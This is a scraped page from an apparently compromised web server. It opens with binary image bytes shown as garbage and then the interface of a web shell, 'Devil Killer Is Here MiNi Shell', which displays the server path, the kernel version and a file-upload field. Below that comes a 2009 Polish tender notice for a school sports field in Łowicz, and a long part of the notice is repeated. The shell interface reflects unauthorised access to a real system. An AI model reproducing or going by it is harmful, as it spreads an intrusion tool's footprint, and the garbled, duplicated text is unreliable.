JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/73505-N-2009.html

<p class="kh_header"><b>Łowicz: Budowa boiska wielofunkcyjnego przy Szkole Podstawowej Nr 1 w Łowiczu przy ul. Kaliskiej 12</b><br>
<b>Numer ogłoszenia: 73505 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 046 830-91-51, faks 046 830-91-60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.lowicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska wielofunkcyjnego przy Szkole Podstawowej Nr 1 w Łowiczu przy ul. Kaliskiej 12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie boiska wielofunkcyjnego przy Szkole Podstawowej Nr 1 w Łowiczu przy ul. Kaliskiej 12 o następujących parametrach technicznych:
Boisko wielofunkcyjne o nawierzchni poliuretanowej, przepuszczalnej dla wody gr. min. 13mm o  powierzchni 1330,50 m2 
Montaż ogrodzenia systemowego o wysokości h=4,0 m - 149 mb wraz z bramą i dwiema furtkami, 
oraz piłkochwytów h=5,0 m - 60 mb
Odwodnienie liniowe szer. 16 cm - 151,83 mb
- ruszt szczelinowy ocynkowany A 15 - 118,7 mb
- ruszt kratowy ocynkowany B 125 - 33,13 mb
Przyłącze kanalizacji deszczowej dn 200mm - 96,90 mb, dn 160 mm - 47,08 mb
Studnie rewizyjne z kręgów betonowych o śr. 1000 mm - 2 st.
Studnie kanalizacyjne PP/PE o śr. 415 mm - 3 szt.
Studnie kanalizacyjne PP/PE o śr. 315 mm - 4 szt.
Przyłącze kanalizacji sanitarnej z rur PCV dn 200 mm - 89,50 mb , dn 160 mm - 39,00 mb
Należy zdemontować studnie - szt. 6 wraz istniejącą kanalizację sanitarną ks 150 i ks 200, przebiegającą pod nowoprojektowaną płytą boiska wielofunkcyjnego. W miejsce zdemontowanej kanalizacji, projektuje się nową kanalizację sanitarną
Studnie rewizyjne z kręgów betonowych o śr. 1000 mm - 2 st.
Studnie kanalizacyjne PP/PE o śr. 315 mm - 6 szt.
Ułożenie obrzeży betonowych - 200 mb
Ułożenie chodnika z kostki betonowej - 750 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10 000,00 zł (słownie: dziesięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków.
1) Opis warunków udziału w postępowaniu
O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają wymagania opisane w
art. 22 ust.1 Ustawy t.j.:
a)  posiadają uprawnienia do wykonywania  działalności określonej przedmiotem zamówienia ,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych 
w art. 24 Ustawy,
e) złożą w wymaganym terminie kompletną pisemną ofertę na formularzu ofertowym, zgodnie ze SIWZ,
f)  wniosą  wadium zgodnie z zapisami w SIWZ,
d) wyrażą zgodę na realizację faktur za wykonanie przedmiotu umowy w terminie 30 dni od daty  ich otrzymania przez Zamawiającego na podstawie odpowiednio częściowych protokołów robót i końcowego bezusterkowego protokołu odbioru robót, 
i) udzielą gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 36 miesięcy.

Uwaga 3
     Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w Ustawie oraz niniejszej specyfikacji.
	Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie mniejszego zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt. 5.1 lit. a-c. Warunek określony w pkt. 5.1 lit. d musi spełniać każdy Wykonawca.
2) Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.
a) Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia nie spełnia tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia oferenta.
b) Sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin  komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania.

6. Wykaz oświadczeń i dokumentów jakie mają dostarczyć wykonawcy  w celu potwierdzenia  
spełniania warunków udziału w postępowaniu.
6.1 a) Oświadczenie-  wykaz osób, którymi dysponuje lub będzie dysponować  Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, zdolnymi do wykonania zamówienia tj. posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach:
- konstrukcyjno- budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych,
Osoby te winny przynależeć do właściwej dla nich Okręgowej Izby Inżynierów Budownictwa i posiadać ubezpieczenie od odpowiedzialności cywilnej za szkody wyrządzone w związku z wykorzystaniem samodzielnych funkcji technicznych w budownictwie w zakresie posiadanych uprawnień budowlanych.
b) oświadczenie o posiadaniu uprawnień do występowania w obrocie prawnym w zakresie zamówienia, 
c) oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponowaniu potencjałem      technicznym i  osobami zdolnymi do wykonania zamówienia, 
d) oświadczenie że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
e) oświadczenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z             powodów wymienionych w art. 24 ust. 1 i 2 Ustawy. 
f) oświadczenie iż wyraża zgodę na wypłatę przez Zamawiającego wynagrodzenia za wykonany przedmiot umowy na podstawie czterech faktur: trzech faktur częściowych  po wykonaniu odpowiednio 25%, 50%, 75% zakresu rzeczowego przedmiotu zamówienia robót i końcowej po wykonaniu całości robót, ich odbiorze na podstawie odpowiednio częściowego i końcowego bezusterkowego protokołu odbioru robót, podpisanego przez Inspektora Nadzoru Inwestorskiego i Zamawiającego,
g) oświadczenie iż wyraża zgodę na realizację faktur za wykonane roboty w terminie 30 dni od daty  ich  otrzymania przez Zamawiającego, 
h) oświadczenie, że wykonawca zapoznał się i przyjmuje bez zastrzeżeń do realizacji warunki specyfikacji i akceptuje projekt umowy stanowiący załącznik do SIWZ i zobowiązuje się do zawarcia umowy na wymienionych w niej warunkach,
i) oświadczenie o zobowiązaniu się do wpłacenia wniesienia zabezpieczenia należytego wykonania  umowy o równowartości  5 %  ceny ofertowej brutto, w przypadku wybrania oferty przez Zamawiającego oraz wstępne określenie formy w jakiej to zabezpieczenie zostanie  wniesione  (podać formę) ,
j) wypełniony i podpisany kosztorys ofertowy wykonany na podstawie dostarczonego przez  Zamawiającego przedmiaru robót (uproszczony),
k) oświadczenie - informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy -w tym okresie,
l) oświadczenie-wykaz niezbędnych do wykonania zamówienia urządzeń i narzędzi jakimi dysponuje wykonawca,
m) oświadczenie - wykaz osób (podmiotów) z podaniem nazw firm, które będą wykonywać zamówienie wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich częściach zamówienia, których wykonanie zamierza powierzyć podwykonawcy om, chyba że całość przedmiotu zamówienia Wykonawca będzie wykonywał we własnym zakresie.
n) oświadczenie -wykaz przynajmniej 2-ch robót wykonywanych w ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym (boiska o nawierzchni poliuretanowej o powierzchni min 1000 m2) stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca  wykonania robót oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie: listy referencyjne, protokoły bezusterkowego odbioru robót, 
o)oświadczenie o okresie udzielonej gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 36 miesięcy,
p) oświadczenie, że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie społeczne,	
r) oświadczenie o zobowiązaniu Wykonawcy do przedłużenia i dostarczeniu Zamawiającemu polisy   lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca będzie ubezpieczony od odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej działalności gospodarczej przez cały okres realizacji niniejszego zamówienia.
Uwaga 4
 Zamawiający żąda pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia,  dokument wymieniony w pkt. 1. a  powinien przedłożyć ten lub ci spośród wykonawców, którzy potwierdzają spełnienie warunku.
2) Wykaz dokumentów
a) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,     
b) w przypadku spółki cywilnej lub konsorcjum każdy ze wspólników (konsorcjantów) składa dodatkowo:
- wykaz wspólników lub konsorcjantów ubiegających się o udzielenie zamówienia,
- pełnomocnictwo udzielone jednemu ze wspólników lub konsorcjantów lub innej osobie do reprezentowania ich w przetargu lub reprezentowania ich w przetargu i zawarcia umowy.

Uwaga 5  
Przed podpisaniem umowy wspólnicy spółki cywilnej lub konsorcjanci okażą Zamawiającemu umowę spółki cywilnej lub konsorcjum określającą wzajemne prawa i obowiązki stron i regulującą ich współpracę.

c) kopia stosownych dokumentów (oryginał do wglądu) potwierdzających uprawnienia   budowlane osób ze strony Wykonawcy, którzy będą kierować robotami budowlanymi  -w zakresie zamówienia (art. 22 ust. 1 pkt.. 1): 
-  kierownik budowy w specjalności konstrukcyjno-budowlanej, 
- kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, 
d) kopia zaświadczenia stwierdzającego przynależność osoby ób, która e kierować będzie ą       przedmiotowymi robotami budowlanymi  do właściwej dla niego Okręgowej Izby Inżynierów       Budownictwa (oryginał do wglądu),   
e) sprawozdanie finansowe albo jego część a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu lub jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
f) polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od        odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej         działalności gospodarczej -zgodnego z przedmiotem niniejszego zamówienia w wysokości nie mniejszej  niż 400 000,00 zł (słownie: czterysta tysięcy złotych). Ważność polisy musi obejmować minimum okres związania ofertą.
g) harmonogram rzeczowo-finansowy robót określający zakresy rzeczowe robót (wynikające z kosztorysu  ofertowego), które będą  stanowiły odrębne przedmioty  odbioru  z  podaniem  kwot za ich wykonanie oraz terminów składania faktur,
h) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa wyżej, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane     (Dz.U. Nr 87, poz.605 i Dz. U. z 2008 r, Nr 188, poz. 1155 ).


Uwaga 6
   Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez  Wykonawcę - zgodnie z formą reprezentacji określoną w rejestrze handlowym, kodeksie cywilnym lub w gminnej ewidencji działalności gospodarczej i opatrzone datą potwierdzenia.

Uwaga 7
   Złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z   art. 24 ust. 2 pkt. 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania  nieprawdziwych informacji wyjdzie  na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa.

Uwaga 8
     W przypadku spółki cywilnej lub konsorcjum wymaga się dostarczenia dokumentów wymienionych  w pkt.  a), e) , f),  g),  złożonych przez każdego wspólnika lub  konsorcjanta  z  osobna.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków.
1) Opis warunków udziału w postępowaniu
O udzielenie zamówienia mogą ubiegać się  Wykonawcy, którzy spełniają wymagania opisane w
art. 22 ust.1 Ustawy t.j.:
a)  posiadają uprawnienia do wykonywania  działalności określonej przedmiotem zamówienia ,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych 
w art. 24 Ustawy,
e) złożą w wymaganym terminie kompletną pisemną ofertę na formularzu ofertowym, zgodnie ze SIWZ,
f)  wniosą  wadium zgodnie z zapisami w SIWZ,
d) wyrażą zgodę na realizację faktur za wykonanie przedmiotu umowy w terminie 30 dni od daty  ich otrzymania przez Zamawiającego na podstawie odpowiednio częściowych protokołów robót i końcowego bezusterkowego protokołu odbioru robót, 
i) udzielą gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 36 miesięcy.

Uwaga 3
     Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w Ustawie oraz niniejszej specyfikacji.
	Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie mniejszego zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt. 5.1 lit. a-c. Warunek określony w pkt. 5.1 lit. d musi spełniać każdy Wykonawca.
2) Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu.
a) Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia  nie spełnia tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia oferenta.
b) Sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin  komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania.

6. Wykaz oświadczeń i dokumentów jakie mają dostarczyć wykonawcy  w celu potwierdzenia  
spełniania warunków udziału w postępowaniu.
6.1 a) Oświadczenie-  wykaz osób, którymi dysponuje lub będzie dysponować  Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, zdolnymi do wykonania zamówienia tj. posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach:
- konstrukcyjno- budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych,
Osoby te winny przynależeć do właściwej dla nich Okręgowej Izby Inżynierów Budownictwa i posiadać ubezpieczenie od odpowiedzialności cywilnej za szkody wyrządzone w związku z wykorzystaniem samodzielnych funkcji technicznych w budownictwie w zakresie posiadanych uprawnień budowlanych.
b) oświadczenie o posiadaniu uprawnień do występowania w obrocie prawnym w zakresie zamówienia, 
c) oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponowaniu potencjałem      technicznym i  osobami zdolnymi do wykonania zamówienia, 
d) oświadczenie że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
e) oświadczenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z             powodów wymienionych w art. 24 ust. 1 i 2 Ustawy. 
f) oświadczenie iż wyraża zgodę na wypłatę przez Zamawiającego wynagrodzenia za wykonany przedmiot umowy na podstawie czterech faktur: trzech faktur częściowych  po wykonaniu odpowiednio 25%, 50%, 75% zakresu rzeczowego przedmiotu zamówienia robót i końcowej po wykonaniu całości robót, ich odbiorze na podstawie odpowiednio częściowego i końcowego bezusterkowego protokołu odbioru robót, podpisanego przez Inspektora Nadzoru Inwestorskiego i Zamawiającego,
g) oświadczenie iż wyraża zgodę na realizację faktur za wykonane roboty w terminie 30 dni od daty  ich  otrzymania przez Zamawiającego, 
h) oświadczenie, że wykonawca zapoznał się i przyjmuje bez zastrzeżeń do realizacji warunki specyfikacji i akceptuje projekt umowy stanowiący załącznik do SIWZ i zobowiązuje się do zawarcia umowy na wymienionych w niej warunkach,
i) oświadczenie o zobowiązaniu się do wpłacenia wniesienia zabezpieczenia należytego wykonania  umowy o równowartości  5 %  ceny ofertowej brutto, w przypadku wybrania oferty przez Zamawiającego oraz wstępne określenie formy w jakiej to zabezpieczenie zostanie  wniesione  (podać formę) ,
j) wypełniony i podpisany kosztorys ofertowy wykonany na podstawie dostarczonego przez  Zamawiającego przedmiaru robót (uproszczony),
k) oświadczenie - informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy -w tym okresie,
l) oświadczenie-wykaz niezbędnych do wykonania zamówienia urządzeń i narzędzi jakimi dysponuje wykonawca,
m) oświadczenie - wykaz osób (podmiotów) z podaniem nazw firm, które będą wykonywać zamówienie wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich częściach zamówienia, których wykonanie zamierza powierzyć podwykonawcy om, chyba że całość przedmiotu zamówienia Wykonawca będzie wykonywał we własnym zakresie.
n) oświadczenie -wykaz przynajmniej 2-ch robót wykonywanych w ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym (boiska o nawierzchni poliuretanowej o powierzchni min 1000 m2) stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca  wykonania robót oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie: listy referencyjne, protokoły bezusterkowego odbioru robót, 
o)oświadczenie o okresie udzielonej gwarancji na wykonany przedmiot zamówienia na okres nie krótszy niż 36 miesięcy,
p) oświadczenie, że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie społeczne,	
r) oświadczenie o zobowiązaniu Wykonawcy do przedłużenia i dostarczeniu Zamawiającemu polisy   lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca będzie ubezpieczony od odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej działalności gospodarczej przez cały okres realizacji niniejszego zamówienia.
Uwaga 4
 Zamawiający żąda pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia,  dokument wymieniony w pkt. 1. a  powinien przedłożyć ten lub ci spośród wykonawców, którzy potwierdzają spełnienie warunku.
2) Wykaz dokumentów
a) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,     
b) w przypadku spółki cywilnej lub konsorcjum każdy ze wspólników (konsorcjantów) składa dodatkowo:
- wykaz wspólników lub konsorcjantów ubiegających się o udzielenie zamówienia,
- pełnomocnictwo udzielone jednemu ze wspólników lub konsorcjantów lub innej osobie do reprezentowania ich w przetargu lub reprezentowania ich w przetargu i zawarcia umowy.

Uwaga 5  
Przed podpisaniem umowy wspólnicy spółki cywilnej lub konsorcjanci okażą Zamawiającemu umowę spółki cywilnej lub konsorcjum określającą wzajemne prawa i obowiązki stron i regulującą ich współpracę.

c) kopia stosownych dokumentów (oryginał do wglądu) potwierdzających uprawnienia   budowlane osób ze strony Wykonawcy, którzy będą kierować robotami budowlanymi  -w zakresie zamówienia (art. 22 ust. 1 pkt.. 1): 
-  kierownik budowy w specjalności konstrukcyjno-budowlanej, 
- kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, 
d) kopia zaświadczenia stwierdzającego przynależność osoby ób, która e kierować będzie ą       przedmiotowymi robotami budowlanymi  do właściwej dla niego Okręgowej Izby Inżynierów       Budownictwa (oryginał do wglądu),   
e) sprawozdanie finansowe albo jego część a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu lub jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
f) polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od        odpowiedzialności cywilnej (ubezpieczenie kontraktowe i deliktowe) w zakresie prowadzonej         działalności gospodarczej -zgodnego z przedmiotem niniejszego zamówienia w wysokości nie mniejszej  niż 400 000,00 zł (słownie: czterysta tysięcy złotych). Ważność polisy musi obejmować minimum okres związania ofertą.
